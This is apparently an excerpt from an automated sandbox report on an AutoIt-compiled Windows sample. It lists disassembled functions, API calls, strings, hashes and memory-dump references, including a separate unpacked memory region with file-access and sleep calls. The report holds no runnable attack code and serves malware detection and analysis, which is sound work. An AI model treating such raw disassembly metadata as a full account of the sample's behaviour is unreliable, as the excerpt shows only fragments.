CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00774D8E,?,?,00000000,00000000), ref: 00774E99
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00774D8E,?,?,00000000,00000000), ref: 00774EB0
LoadResource.KERNEL32(?,00000000,?,?,00774D8E,?,?,00000000,00000000,?,?,?,?,?,?,00774E2F), ref: 007AD937
SizeofResource.KERNEL32(?,00000000,?,?,00774D8E,?,?,00000000,00000000,?,?,?,?,?,?,00774E2F), ref: 007AD94C
LockResource.KERNEL32(00774D8E,?,?,00774D8E,?,?,00000000,00000000,?,?,?,?,?,?,00774E2F,00000000), ref: 007AD95F

Strings

SCRIPT, xrefs: 00774EA6

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 012455e3f4fa6b629a50c576646844a3bcd9a4e3d038da7d2b51520c4b5d6a5b
Instruction ID: 827f1f3d21b18cabcbb3b1a47ef2fe67d6fb08a3328997c72413f92a76cd358e
Opcode Fuzzy Hash: 012455e3f4fa6b629a50c576646844a3bcd9a4e3d038da7d2b51520c4b5d6a5b
Instruction Fuzzy Hash: E1114C75240700ABDB218B65EC48F6B7BBAFFC5B61F108268F40A86250DBA5E800C664

Function 0077FCE0 Relevance: 5.5, APIs: 3, Instructions: 1040COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: BuffCharUpper
String ID:
API String ID: 3964851224-0
Opcode ID: ad24e77aa5cd59afc9d00f57fa91805daeb730fa148ca1a8d242f74b91d00e74
Instruction ID: d0d013d5e62ec1af143ad0c00f05fad504319ce65aedef3c2472b513dbde8f47
Opcode Fuzzy Hash: ad24e77aa5cd59afc9d00f57fa91805daeb730fa148ca1a8d242f74b91d00e74
Instruction Fuzzy Hash: 8F928B70608341DFDB60DF24C484B6AB7E1BF85304F14896DE99A8B362D779EC49CB92

Function 007D445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,007AE398), ref: 007D446A
FindFirstFileW.KERNELBASE(?,?), ref: 007D447B
FindClose.KERNEL32(00000000), ref: 007D448B

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: fc37707d2e6f3b5d28b4091d5e26b86b617f74e429ebe42ace0b5d13939df50f
Instruction ID: 97c73e1249b73b8c8273f5efabbf6e7d28b036e6730f282187ac05231287b8d9
Opcode Fuzzy Hash: fc37707d2e6f3b5d28b4091d5e26b86b617f74e429ebe42ace0b5d13939df50f
Instruction Fuzzy Hash: 21E0D8324105406742106B38EC4D8FD776CAF05335F104716F835C12D0EB7C5940D59A

Function 0077E6A0 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 007B3E62

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: dea78afb0911082dbfe3e03ed43e2f91e052f6d630aa93417d311dbbbdb7a47b
Instruction ID: ee272409c1cab71c52e39e260af17278300ff90cf9e6f057e8995d43ffc44fed
Opcode Fuzzy Hash: dea78afb0911082dbfe3e03ed43e2f91e052f6d630aa93417d311dbbbdb7a47b
Instruction Fuzzy Hash: 70A28B75A00205DFCF24CF58C484AAAB7B2FF59354F24C4A9E909AB351D778ED82CB91

Function 007809D0 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00780A5B
timeGetTime.WINMM ref: 00780D16
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00780E53
Sleep.KERNEL32(0000000A), ref: 00780E61
LockWindowUpdate.USER32(00000000,?,?), ref: 00780EFA
DestroyWindow.USER32 ref: 00780F06
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00780F20
Sleep.KERNEL32(0000000A,?,?), ref: 007B4E83
TranslateMessage.USER32(?), ref: 007B5C60
DispatchMessageW.USER32(?), ref: 007B5C6E
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007B5C82

Strings

@GUI_CTRLID, xrefs: 007B4F3A
@GUI_WINHANDLE, xrefs: 007B4F8F
@TRAY_ID, xrefs: 007B578F
@GUI_CTRLHANDLE, xrefs: 007B4FE4
@COM_EVENTOBJ, xrefs: 007B54F0

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
API String ID: 4212290369-3242690629
Opcode ID: 97fe306a3ab7af95cd48f786b174cffbec752bab042ad9e65839022c75fe6d18
Instruction ID: e092b3172a286adbc83aad626d9d3c8f76600e64ce4ef5394631b4383ee9bbc4
Opcode Fuzzy Hash: 97fe306a3ab7af95cd48f786b174cffbec752bab042ad9e65839022c75fe6d18
Instruction Fuzzy Hash: 07B2E570608741DFDB24EF24C888BAAB7E5FF84304F14891DF559972A1DB79E848CB92

Function 007D9155 Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 007D8F5F: __time64.LIBCMT ref: 007D8F69

Part of subcall function 00774EE5: _fseek.LIBCMT ref: 00774EFD

__wsplitpath.LIBCMT ref: 007D9234

Part of subcall function 007940FB: __wsplitpath_helper.LIBCMT ref: 0079413B

_wcscpy.LIBCMT ref: 007D9247
_wcscat.LIBCMT ref: 007D925A
__wsplitpath.LIBCMT ref: 007D927F
_wcscat.LIBCMT ref: 007D9295
_wcscat.LIBCMT ref: 007D92A8

Part of subcall function 007D8FA5: _memmove.LIBCMT ref: 007D8FDE
Part of subcall function 007D8FA5: _memmove.LIBCMT ref: 007D8FED

_wcscmp.LIBCMT ref: 007D91EF

Part of subcall function 007D9734: _wcscmp.LIBCMT ref: 007D9824
Part of subcall function 007D9734: _wcscmp.LIBCMT ref: 007D9837

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 007D9452
_wcsncpy.LIBCMT ref: 007D94C5
DeleteFileW.KERNEL32(?,?), ref: 007D94FB
CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 007D9511
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 007D9522
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 007D9534

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: 41c69a23c3fcb7edf95bed19660055bb53ebf19521ac2336b43f9928a5f840a3
Instruction ID: 251238f7d25643a8f3f8f76d595bc8e5415ceb342af6bfac40d72ba28b8bf552
Opcode Fuzzy Hash: 41c69a23c3fcb7edf95bed19660055bb53ebf19521ac2336b43f9928a5f840a3
Instruction Fuzzy Hash: 29C14CB1D00219ABDF21DF94DC89EEEB7BCEF45310F0040AAF609E6251DB389A458F65

Function 0077301C Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00773074
RegisterClassExW.USER32(00000030), ref: 0077309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007730AF
InitCommonControlsEx.COMCTL32(?), ref: 007730CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007730DC
LoadIconW.USER32(000000A9), ref: 007730F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00773101

Strings

AutoIt v3 GUI, xrefs: 00773090
0, xrefs: 00773056
+, xrefs: 0077305D
TaskbarCreated, xrefs: 007730A4

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: df1282e06a5072a93a936987679f1464cddf81f4c35c22cfde079329aea22855
Instruction ID: 482d0fab28b514fbf5e0881222551120cc0b89919e463ad41944d20d7aa675d1
Opcode Fuzzy Hash: df1282e06a5072a93a936987679f1464cddf81f4c35c22cfde079329aea22855
Instruction Fuzzy Hash: 153128B1941309AFDB00DFA4DC89AEEBBF4FF09310F10852AE590E62A0D7B94545CF95

Function 00773041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00773074
RegisterClassExW.USER32(00000030), ref: 0077309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007730AF
InitCommonControlsEx.COMCTL32(?), ref: 007730CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007730DC
LoadIconW.USER32(000000A9), ref: 007730F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00773101

Strings

AutoIt v3 GUI, xrefs: 00773090
0, xrefs: 00773056
+, xrefs: 0077305D
TaskbarCreated, xrefs: 007730A4

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: c797db447e89c1068dd09b57bd333a54efa99f2eaecca23e98b121932d8b9d54
Instruction ID: 45fec844c0b6381af92b1a641fe799bc998144b0d841f203d4cc14bfe5f826d6
Opcode Fuzzy Hash: c797db447e89c1068dd09b57bd333a54efa99f2eaecca23e98b121932d8b9d54
Instruction Fuzzy Hash: 4021C9B1901618AFDB00DF94EC89B9EBBF4FB08710F00852AF610E62A0DBB54544CFA5

Function 0077708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00774706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,008352F8,?,007737AE,?), ref: 00774724

Part of subcall function 0079050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00777165), ref: 0079052D

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 007771A8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 007AE8C8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 007AE909
RegCloseKey.ADVAPI32(?), ref: 007AE947
_wcscat.LIBCMT ref: 007AE9A0

Strings

Include, xrefs: 007AE8BF, 007AE900
\, xrefs: 007AE9C3
\Include\, xrefs: 00777165
Software\AutoIt v3\AutoIt, xrefs: 0077719E

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: 321528fe8ec729730b6ae1ddc19d12f567e540699325a809b3908e6cc4d1e95a
Instruction ID: 45b3e2ab93d051124608c8907b2aecb8ce535c849ec1e952fa2d8c1f8f609a8b
Opcode Fuzzy Hash: 321528fe8ec729730b6ae1ddc19d12f567e540699325a809b3908e6cc4d1e95a
Instruction Fuzzy Hash: 2271BF71508301EEC704EF28EC459ABB7E8FF85350F41892EF548C32A0EB74A958CB92

Function 00773A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00773A50
LoadCursorW.USER32(00000000,00007F00), ref: 00773A5F
LoadIconW.USER32(00000063), ref: 00773A76
LoadIconW.USER32(000000A4), ref: 00773A88
LoadIconW.USER32(000000A2), ref: 00773A9A
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00773AC0
RegisterClassExW.USER32(?), ref: 00773B16

Part of subcall function 00773041: GetSysColorBrush.USER32(0000000F), ref: 00773074
Part of subcall function 00773041: RegisterClassExW.USER32(00000030), ref: 0077309E
Part of subcall function 00773041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007730AF
Part of subcall function 00773041: InitCommonControlsEx.COMCTL32(?), ref: 007730CC
Part of subcall function 00773041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007730DC
Part of subcall function 00773041: LoadIconW.USER32(000000A9), ref: 007730F2
Part of subcall function 00773041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00773101

Strings

AutoIt v3, xrefs: 00773B05
#, xrefs: 00773AFB
0, xrefs: 00773AF4

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 3069b33ae6494eeb34a33b2dedd9506c4f5b813cccef2ddc4565cece6f40f558
Instruction ID: d7a86896f24d99b30bf70b6034714e8950e9d803b7ae8e50ffcddc8c814eb85d
Opcode Fuzzy Hash: 3069b33ae6494eeb34a33b2dedd9506c4f5b813cccef2ddc4565cece6f40f558
Instruction Fuzzy Hash: F0214B71D00308EFEB10EFA4EC49B9E7BB1FB48711F10452AF904A62A1D7B95650DF94

Function 00773633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 007736D2
KillTimer.USER32(?,00000001), ref: 007736FC
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0077371F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0077372A
CreatePopupMenu.USER32 ref: 0077373E
PostQuitMessage.USER32(00000000), ref: 0077374D

Strings

TaskbarCreated, xrefs: 00773725

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 7ff945001e8dc56d9b14896d3ada21dc50988d96a0c8abe1b3436757d3fac40c
Instruction ID: 18989ca370d015eacd68210414d7f617726f60be7f86598aa6807fb4812a52dd
Opcode Fuzzy Hash: 7ff945001e8dc56d9b14896d3ada21dc50988d96a0c8abe1b3436757d3fac40c
Instruction Fuzzy Hash: 804157B2200505FBDF246F68DC4DB7A3754FB81380F508935F60AD62A1DB6D9E05A3B5

Function 00773766 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

>>>AUTOIT NO CMDEXECUTE<<<, xrefs: 007737AE
CMDLINERAW, xrefs: 007737FB
/ErrorStdOut, xrefs: 0077387D
/AutoIt3ExecuteScript, xrefs: 007738BC
/AutoIt3ExecuteLine, xrefs: 007738A7
/AutoIt3OutputDebug, xrefs: 00773892
CMDLINE, xrefs: 00773822

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
API String ID: 1825951767-3513169116
Opcode ID: e8e0df52cbb991e64ab72c5d4eaf5ac2c6ab390b0cc192a5319782ebe5406f13
Instruction ID: b1d9d2056cc0fde8ae94bfc971c6cb16f634d61958af709f5ec2f2478d0ed190
Opcode Fuzzy Hash: e8e0df52cbb991e64ab72c5d4eaf5ac2c6ab390b0cc192a5319782ebe5406f13
Instruction Fuzzy Hash: 14A18F7191021DEACF04EBA0DC99EEEB778BF55340F448429F51AB7191DF786A08CBA1

Function 0114EFB0 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 0114F081
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0114F2A7

Memory Dump Source

Source File: 00000000.00000002.1720818394.000000000114C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0114C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_114c000_gKvjKMCUfq.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
Instruction ID: 008ab6c97d4059a46927d6aa003eadfecfc86750d35f6cf902f97836fc50ec4f
Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
Instruction Fuzzy Hash: EAA1FA74E0020AEBDB18CFA8C894BEEBBB5FF48B04F108159E515BB381D7759A41CB95

Function 007739D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00773A03
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00773A24
ShowWindow.USER32(00000000,?,?), ref: 00773A38
ShowWindow.USER32(00000000,?,?), ref: 00773A41

Strings

edit, xrefs: 00773A1E
AutoIt v3, xrefs: 007739FB, 00773A00, 00773A01

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: e9762b535a6bbe6b457f33e05f821cac442a354e67cb81149fd658ca4743125f
Instruction ID: 4324f99d0c2035b09db04019692850b7ae7b6f453c07f7457ea78803e6e9a8e7
Opcode Fuzzy Hash: e9762b535a6bbe6b457f33e05f821cac442a354e67cb81149fd658ca4743125f
Instruction Fuzzy Hash: CCF03A70500694BEEA3067276C08E3B2E7DEBC6F50B00442AFA00A2270CA651810CAB0

Function 0114ED80 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 145
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0114EC70: Sleep.KERNELBASE(000001F4), ref: 0114EC81

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0114EEA8

Strings

13H461TMYSS, xrefs: 0114EF0B, 0114EF0E

Memory Dump Source

Source File: 00000000.00000002.1720818394.000000000114C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0114C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_114c000_gKvjKMCUfq.jbxd

Similarity

API ID: CreateFileSleep
String ID: 13H461TMYSS
API String ID: 2694422964-3314243326
Opcode ID: 4eddce9c231c84ab3d70a50c1c5f1848fd14679381eb5efa60a54c8991cee8e0
Instruction ID: 73ee5837ce3c05fb79b5404b1a187a065ca875c9c233090b629794fbc75f7e5e
Opcode Fuzzy Hash: 4eddce9c231c84ab3d70a50c1c5f1848fd14679381eb5efa60a54c8991cee8e0
Instruction Fuzzy Hash: 5551AD30D05249EBEF15DBB4C815BEEBB79EF18700F004599A608BB2C0D7B94B45CBA6

Function 0077407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 007AD3D7

Part of subcall function 00777BCC: _memmove.LIBCMT ref: 00777C06

_memset.LIBCMT ref: 007740FC
_wcscpy.LIBCMT ref: 00774150
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00774160

Strings

Line: , xrefs: 007AD400

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

